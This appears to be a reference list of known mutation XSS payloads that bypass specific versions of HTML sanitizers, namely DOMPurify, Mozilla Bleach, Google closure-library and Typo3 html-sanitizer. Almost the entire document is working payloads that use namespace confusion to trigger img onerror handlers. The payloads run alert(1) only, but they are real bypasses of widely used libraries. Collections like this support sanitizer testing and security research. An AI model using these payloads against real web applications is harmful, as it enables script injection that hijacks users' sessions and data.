Known payloads
Mutation XSS
Most of the payloads exploit namespace confusion techniques.
DOMPurify
2.0.0
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
2.0.17
<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>
2.0.17
<math><mtext><table><mglyph><style><!--</style><img title="--></mglyph><img	src=1	onerror=alert(1)>">
2.0.17
<math><mtext><table><mglyph><style><math><table id="</table>"><img src onerror=alert(1)">
2.2.0
<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">
2.2.3
<svg><xss><desc><noscript></noscript></desc><p></p><style><a title="</style><img src onerror=alert(1)>">
3.0.8
<svg><annotation-xml><foreignobject><style><!--</style><p id="--><img src='x' onerror='alert(1)'>">
3.1.0
n = 506; var payload = `${"<div>".repeat(n)}<table id="outer"><caption id="outer"><svg><desc><table id="inner"><caption id="inner"></caption></table></desc><style><a title="</style><img src onerror=alert(1)>"></a></style></svg></caption></table>${"</div>".repeat(n)}`;
3.1.7
<svg><a><foreignobject><a><table><a></table><style><!--</style></svg><a id="-><img src onerror=alert(1)>">.
3.2.1
<math><foo-test><mi><li><table><foo-test><li></li></foo-test>a<a><style><!--</style>a<foo-bar is="--><img src=x onerror=alert(1)>">
3.2.2
<math><foo-test><mi><li><table><foo-test><li></li></foo-test><a><style><! \${</style>}<foo-b id="><img src onerror='alert(1)'>">hmm...</foo-b></a></table></li></mi></foo-test></math>
Mozilla Bleach
3.1.0
<noscript><style></noscript><img src=x onerror=alert(1)>
3.1.1
<svg><style><img src=x onerror=alert(1)>
3.2.3
<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>
Google closure-library
v20190215
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
Typo3 html-sanitizer
2.0.15
<!--a foo=--!><img src=x onerror=alert(1)><!--<a>">
2.0.16
<![CDATA[<math><img src=x onerror=alert(1)>]]>